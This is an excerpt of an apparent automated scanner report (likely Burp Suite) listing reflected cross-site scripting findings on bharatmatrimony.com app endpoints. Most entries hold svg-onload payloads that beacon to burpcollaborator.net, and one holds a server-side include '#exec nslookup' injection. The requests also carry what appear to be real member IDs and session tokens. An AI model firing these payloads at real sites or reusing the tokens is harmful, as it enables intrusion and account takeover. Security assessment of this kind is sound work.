Path: /appassuredcontact/getphoneprivacy.php
Issue detail
Request
POST /appassuredcontact/getphoneprivacy.phpn9mt2m82k4?SDBMATRID=M6651646 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 254
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
Server: Apache
Content-Length: 245
Date: Tue, 19 May 2020 16:26:46 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appassuredcontact/getphoneprivacy.phpn9mt2m82k4 was not found on this server.</p>
...[SNIP]...
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.ph
p [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Path: /appassuredcontact/getphoneprivacy.php
Issue detail
Request
POST /appassuredcontact/getphoneprivacy.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fk6rxs4cc0o5fonph1dppe90fw62xqpgda02or%5c56burpcollaborator.net'%3e?SDBMATRID=M6651646 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 254
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
Server: Apache
Content-Length: 347
Date: Tue, 19 May 2020 16:43:30 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appassuredcontact/getphoneprivacy.php/'"><svg/onload=(new(Image)).src='//k6rxs4cc0o5fonph1dppe90fw62xqpgda02
or\56burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Path: /appdaily6/yettobeviewed.php
Issue detail
Request
POST /appdaily6/yettobeviewed.phpwe5v73hy5d HTTP/1.1
Accept: */*
Connection: close
Content-Length: 174
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
Server: Apache
Content-Length: 235
Date: Tue, 19 May 2020 16:12:53 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdaily6/yettobeviewed.phpwe5v73hy5d was not found on this server.</p>
...[SNIP]...
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Path: /appdaily6/yettobeviewed.php
Issue detail
Request
POST /appdaily6/yettobeviewed.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2flncy95tdhpmg5o6iie6qvahgd7jz7rxfr2jq8%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 174
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
Response
Server: Apache
Content-Length: 337
Date: Tue, 19 May 2020 16:15:51 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appdaily6/yettobeviewed.php/'"><svg/onload=(new(Image)).src='//lncy95tdhpmg5o6iie6qvahgd7jz7rxfr2jq8\56burpcoll
aborator.net'> was not found on this server.</p>
...[SNIP]...
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.
php [URL path filename]
Previous Next
Summary
Confidence: Certain
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
Request
POST /appdynamicarray/appdynamicpopulate.phpgyh11l7k61 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 93
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
Server: Apache
Content-Length: 246
Date: Tue, 19 May 2020 16:07:46 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdynamicarray/appdynamicpopulate.phpgyh11l7k61 was not found on this server.</p>
...[SNIP]...
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.
Previous Next
Summary
Confidence: Certain
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
Request
POST /appdynamicarray/appdynamicpopulate.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f547iqpaxy930m8n2zynacuy0ur0koce08n0bp%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 93
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
Server: Apache
Content-Length: 348
Date: Tue, 19 May 2020 16:12:50 GMT
Connection: close
<html><head>
</head><body>
<h1>Not Found</h1>
/appdynamicarray/appdynamicpopulate.php/'"><svg/onload=(new(Image)).src='//547iqpaxy930m8n2zynacuy0ur0koce08
n0bp\56burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.p
hp [URL path filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /appdynamicarray/28jsk7l01k HTTP/1.1
Accept: */*
Connection: close
Content-Length: 58
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
Server: Apache
Content-Length: 224
Date: Tue, 19 May 2020 16:00:51 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdynamicarray/28jsk7l01k was not found on this server.</p>
...[SNIP]...
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /appdynamicarray/appgetarrayversion.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f7aikwrgz4b92sat450tciw420t6ougl4fr7fw
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 58
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
Server: Apache
Content-Length: 427
Date: Tue, 19 May 2020 16:11:59 GMT
Connection: close
<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdynamicarray/appgetarrayversion.php/javascript:/*</script><svg/onload='+/"/
+/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/7aikwrgz4b92sat450tciw420t6ougl4fr7fw\.burpcollaborator.net/).replace(/\\/g,
[]))//'> was not found on this server.</p>
...[SNIP]...
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL
path filename]
Previous Next
Summary
Confidence: Certain
Path: /appeditprofile/appeditprofile.php
Issue detail
Request
POST /appeditprofile/appeditprofile.phpz3hefiy4bv HTTP/1.1
Accept: */*
Connection: close
Content-Length: 175
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
Server: Apache
Content-Length: 241
Date: Tue, 19 May 2020 16:11:20 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appeditprofile/appeditprofile.phpz3hefiy4bv was not found on this server.</p>
...[SNIP]...
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Path: /appeditprofile/appeditprofile.php
Issue detail
Request
POST /appeditprofile/appeditprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f2vyfhm1up6uxd5ezqve73rpxlorkfc50znrbg%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 175
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
Server: Apache
Content-Length: 343
Date: Tue, 19 May 2020 16:14:40 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appeditprofile/appeditprofile.php/'"><svg/onload=(new(Image)).src='//2vyfhm1up6uxd5ezqve73rpxlorkfc50znrbg\56bur
pcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php
[URL path filename]
Previous Next
Summary
Confidence: Certain
Path: /appeditprofile/appownprofile.php
Issue detail
Request
POST /appeditprofile/appownprofile.phpz0hjwo4iu8 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 249
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
Server: Apache
Content-Length: 240
Date: Tue, 19 May 2020 16:20:45 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appeditprofile/appownprofile.phpz0hjwo4iu8 was not found on this server.</p>
...[SNIP]...
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php
Previous Next
Summary
Confidence: Certain
Path: /appeditprofile/appownprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response .
Request
POST /appeditprofile/appownprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fybdbxihq52att1uv6ru3jn5t1k7hv9lxfk78w%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 249
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
Server: Apache
Content-Length: 342
Date: Tue, 19 May 2020 16:25:00 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appeditprofile/appownprofile.php/'"><svg/onload=(new(Image)).src='//ybdbxihq52att1uv6ru3jn5t1k7hv9lxfk78w\56bur
pcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
GET /appei/appspromos.phpydbgaayrwb?
Connection: close
Accept: */*
Response
Server: Apache
Content-Length: 228
Date: Tue, 19 May 2020 16:13:26 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appei/appspromos.phpydbgaayrwb was not found on this server.</p>
...[SNIP]...
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an
arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
GET /appei/appspromos.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f1qseclwtk5pw849ylu96yqkwgnmlad11vomcb
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e?
Connection: close
Accept: */*
Response
Server: Apache
Content-Length: 409
Date: Tue, 19 May 2020 16:17:22 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appei/appspromos.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+
((new(Image)).src=([]+/\/1qseclwtk5pw849ylu96yqkwgnmlad11vomcb\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not found
on this server.</p>
...[SNIP]...
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL
path filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /applogin/appgetcountryip.phpq487ybrymd HTTP/1.1
Accept: */*
Connection: close
Content-Length: 72
Response
Server: Apache
Content-Length: 236
Akamai-Age-Ms: 1589904157623
Date: Tue, 19 May 2020 16:02:37 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/appgetcountryip.phpq487ybrymd was not found on this server.</p>
...[SNIP]...
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name
of an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /applogin/appgetcountryip.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fowo1i82gqsvjerflrhft4dqjmas9g16p0cs0h%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 72
Response
Server: Apache
Content-Length: 338
Date: Tue, 19 May 2020 16:12:03 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/applogin/appgetcountryip.php/'"><svg/onload=(new(Image)).src='//owo1i82gqsvjerflrhft4dqjmas9g16p0cs0h\56burpcol
laborator.net'> was not found on this server.</p>
...[SNIP]...
5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Path: /applogin/getDeviceInfo.php
Issue detail
Request
POST /applogin/65d1vunofq?SDBMATRID=M6651646 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 209
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=1e3edd6071d0eb091e7a25711511fe2a7&ENTRYTYPE=M&ID=M66
51646&LOGINGEN=M&OUTPUTTYPE=2&SDBMATRID=M6651646&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf1
...[SNIP]...
Response
Server: Apache
Content-Length: 217
Date: Tue, 19 May 2020 16:22:21 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/65d1vunofq was not found on this server.</p>
...[SNIP]...
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of
Previous Next
Summary
Confidence: Certain
Path: /applogin/getDeviceInfo.php
Issue detail
Request
GET /applogin/getDeviceInfo.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2f0kld6kqse4jv233xft35spevamge72ztnnaey3%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
Server: Apache
Content-Length: 416
Date: Tue, 19 May 2020 17:09:22 GMT
Connection: close
<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/getDeviceInfo.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/[]/
+((new(Image)).src=([]+/\/0kld6kqse4jv233xft35spevamge72ztnnaey3\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not found
on this server.</p>
...[SNIP]...
5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /applogin/loginwithdet.php8t3f64t875 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 611
%22ISO_COUNT
...[SNIP]...
Response
Server: Apache
Content-Length: 233
Date: Tue, 19 May 2020 17:25:39 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/loginwithdet.php8t3f64t875 was not found on this server.</p>
...[SNIP]...
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of
Previous Next
Summary
Confidence: Certain
Issue detail
Request
GET /applogin/loginwithdet.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Accept-Language: en
Connection: close
Response
Server: Apache
Content-Length: 336
Date: Tue, 19 May 2020 17:09:27 GMT
Connection: close
<html><head>
</head><body>
<h1>Not Found</h1>
/applogin/loginwithdet.php/'"><svg/onload=(new(Image)).src='//6z6jlq5ytay1h9i3uzib7vt1psvkn8fy3sqje8\56burpcollabo
rator.net'> was not found on this server.</p>
...[SNIP]...
5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /applogin/i54fkzlfj5 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 159
Response
Server: Apache
Content-Length: 217
Date: Tue, 19 May 2020 16:08:48 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /applogin/i54fkzlfj5 was not found on this server.</p>
...[SNIP]...
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an
arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /applogin/logout.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f9kum6tq1edj42c36f23esye4avgx4pudo0go5%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 159
Response
Server: Apache
Content-Length: 329
Date: Tue, 19 May 2020 16:13:02 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/applogin/logout.php/'"><svg/onload=(new(Image)).src='//9kum6tq1edj42c36f23esye4avgx4pudo0go5\56burpcollaborat
or.net'> was not found on this server.</p>
...[SNIP]...
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL
path filename]
Previous Next
Summary
Confidence: Certain
Path: /appmemberhome/memstats.php
Issue detail
Request
POST /appmemberhome/ylu1gn7umd HTTP/1.1
Accept: */*
Connection: close
Content-Length: 170
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FRMLOGIN=0&ID=M6651
Response
Server: Apache
Content-Length: 222
Date: Tue, 19 May 2020 17:00:45 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appmemberhome/ylu1gn7umd was not found on this server.</p>
...[SNIP]...
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /appmemberhome/memstats.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fob31x8hg5sajtrul6hutjd5j1a7ev6lufh75w%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 170
Response
Server: Apache
Content-Length: 336
Date: Tue, 19 May 2020 17:04:20 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appmemberhome/memstats.php/'"><svg/onload=(new(Image)).src='//ob31x8hg5sajtrul6hutjd5j1a7ev6lufh75w\56burp
collaborator.net'> was not found on this server.</p>
...[SNIP]...
5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Path: /appphoto/enlargephoto.php
Issue detail
Request
POST /appphoto/enlargephoto.phpf68bdjilf8 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 255
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
Server: Apache
Content-Length: 233
Date: Tue, 19 May 2020 16:58:44 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appphoto/enlargephoto.phpf68bdjilf8 was not found on this server.</p>
...[SNIP]...
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of
Previous Next
Summary
Confidence: Certain
Path: /appphoto/enlargephoto.php
Issue detail
Request
POST /appphoto/enlargephoto.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fzorcajuri3nu627wjs74woiuelkq8iy6stkh9%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 255
APPTYPE=101&APPVERSION=%26APPVERSION%3D4.6&APPVERSIONCODE=%26APPVERSIONCODE
%3D192&ENCID=82518c062044e155fce5b3980c0e28c60&ENTRYTYPE=M&ID=M6651646&LOGINGEN=M&OUTPUTTYPE=2&SDBMAT
RID=M6651646&TOKENID=131
...[SNIP]...
Response
Server: Apache
Content-Length: 335
Date: Tue, 19 May 2020 17:04:11 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appphoto/enlargephoto.php/'"><svg/onload=(new(Image)).src='//zorcajuri3nu627wjs74woiuelkq8iy6stkh9\56burpcollab
orator.net'> was not found on this server.</p>
...[SNIP]...
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php
[URL path filename]
Previous Next
Summary
Confidence: Certain
Path: /appphoto/enlargephotodisplay.php
Issue detail
Request
POST /appphoto/enlargephotodisplay.php3idgo4qx24 HTTP/1.1
Accept: */*
Connection: close
Content-Length: 195
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
Server: Apache
Content-Length: 240
Date: Tue, 19 May 2020 16:51:30 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appphoto/enlargephotodisplay.php3idgo4qx24 was not found on this server.</p>
...[SNIP]...
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php
Previous Next
Summary
Confidence: Certain
Path: /appphoto/enlargephotodisplay.php
Issue detail
Request
POST /appphoto/enlargephotodisplay.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f6krj6qqyeaj12933fz3bsve1asgj67yxmr9jx8%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 195
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=82518c062044e155fce5b3980c0e28c60&ID=M6651646&OUTPUT
TYPE=2&PHOTOPWD=PHOTOPWD&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&VIEWEDID=M6651646
Response
Server: Apache
Content-Length: 343
Date: Tue, 19 May 2020 17:05:07 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appphoto/enlargephotodisplay.php/'"><svg/onload=(new(Image)).src='//6krj6qqyeaj12933fz3bsve1asgj67yxmr9jx8\56b
urpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /appsearch/%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%22z9y%22%20value%3d%22y8xbuieq22%22--%3e%3c!--
%23set%20var%3d%221b0%22%20value%3d%220azdwkgs44%22--%3e%3c!--%23echo%20var%3d%22z9y%22--%3e%3c!--%23echo
%20var%3d%221b0%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname
%20lvkyh51dppugdoeiqeeq3apgl7ryimakybqygm5.burpcollaborator.net%22%20--%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 51
Response
Server: Apache
Content-Length: 556
Date: Tue, 19 May 2020 16:34:38 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appsearch/"-->'-->`--> was not found on this server.</p>
...[SNIP]...
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of
Previous Next
Summary
Confidence: Certain
Issue detail
Request
POST /appsearch/appcurltrack.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2ftsp6edylmxroawbqnmby0imoifo6fu7lvfi76w
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 51
Response
Server: Apache
Content-Length: 416
Date: Tue, 19 May 2020 16:41:47 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appsearch/appcurltrack.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/[*/
[]/+((new(Image)).src=([]+/\/tsp6edylmxroawbqnmby0imoifo6fu7lvfi76w\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not
found on this server.</p>
...[SNIP]...
[URL path filename]
Previous Next
Summary
Confidence: Certain
Issue detail
Request
GET /appsearch/appwhoviewedprofile.phpmn53oagde5?
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Connection: close
Accept: */*
Response
Server: Apache
Content-Length: 241
Date: Tue, 19 May 2020 17:13:49 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appsearch/appwhoviewedprofile.phpmn53oagde5 was not found on this server.</p>
...[SNIP]...
Previous Next
Summary
Confidence: Certain
Issue detail
Request
GET /appsearch/appwhoviewedprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fvwv8if2nqzvqeyfsrof04kqqmhs9rxjn7hu8ix%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Accept-Language: en
Connection: close
Response
Server: Apache
Content-Length: 344
Date: Tue, 19 May 2020 17:11:58 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appsearch/appwhoviewedprofile.php/'"><svg/onload=(new(Image)).src='//vwv8if2nqzvqeyfsrof04kqqmhs9rxjn7hu8ix\5
6burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL
path filename]
Previous Next
Summary
Confidence: Certain
Path: /appsuccess/successstory.php
Issue detail
Request
POST /appsuccess/d0ktzpdvxq HTTP/1.1
Accept: */*
Connection: close
Content-Length: 215
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
Server: Apache
Content-Length: 219
Date: Tue, 19 May 2020 17:09:25 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appsuccess/d0ktzpdvxq was not found on this server.</p>
...[SNIP]...
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of
Previous Next
Summary
Confidence: Certain
Path: /appsuccess/successstory.php
Issue detail
Request
POST /appsuccess/successstory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fsa65wcgk4w9nsvtp5ltxih4n0e650tsjgd35ru%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 215
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CASTE=1017&DOS=23&ENCID=cec3bc261ddb6cd658084cb7d672bf3f6&I
D=M6651646&LOGINENTRY=F&OUTPUTTYPE=2&RECORDCOUNT=20&STLIMIT=0&TOKENID=131c6f8396a2071562a9b7c10
...[SNIP]...
Response
Server: Apache
Content-Length: 338
Date: Tue, 19 May 2020 17:10:51 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appsuccess/successstory.php/'"><svg/onload=(new(Image)).src='//sa65wcgk4w9nsvtp5ltxih4n0e650tsjgd35ru\56burpcol
...[SNIP]...
5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path

filename]
Previous Next
Summary
Confidence: Certain
Path: /appunified/appinboxui.php
Issue detail
Request
POST /appunified/appinboxui.phpenkvry4ekx HTTP/1.1
Accept: */*
Connection: close
Content-Length: 255
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=118&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&FILTERTYPE=1&ID=M665
